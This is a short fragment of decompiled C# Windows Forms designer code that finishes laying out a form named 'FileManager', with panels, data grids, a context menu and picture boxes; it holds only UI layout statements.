			this.MinimumSize = new global::System.Drawing.Size(701, 897);
			base.Name = "FileManager";
			base.Opacity = 0.0;
			base.ShowIcon = false;
			this.Text = "FileManager";
			this.ctxMenu.ResumeLayout(false);
			this.Panel1.ResumeLayout(false);
			((global::System.ComponentModel.ISupportInitialize)this.DGV0).EndInit();
			((global::System.ComponentModel.ISupportInitialize)this.DGVDATA).EndInit();
			this.Panel6.ResumeLayout(false);
			this.Panel3.ResumeLayout(false);
			this.Panel3.PerformLayout();
			((global::System.ComponentModel.ISupportInitialize)this.viwimage).EndInit();
			((global::System.ComponentModel.ISupportInitialize)this.usrscreen).EndInit();
			((global::System.ComponentModel.ISupportInitialize)this.Usrbtry).EndInit();
			((global::System.ComponentModel.ISupportInitialize)this.ClientPic).EndInit();
			this.Panel4.ResumeLayout(false);
			this.Panel2.ResumeLayout(false);
			this.Panel2.PerformLayout();
			base.ResumeLayout(false);
		}

		// Token: 0x040006DD RID: 1757
		private global::System.ComponentModel.Container components;
	}
}
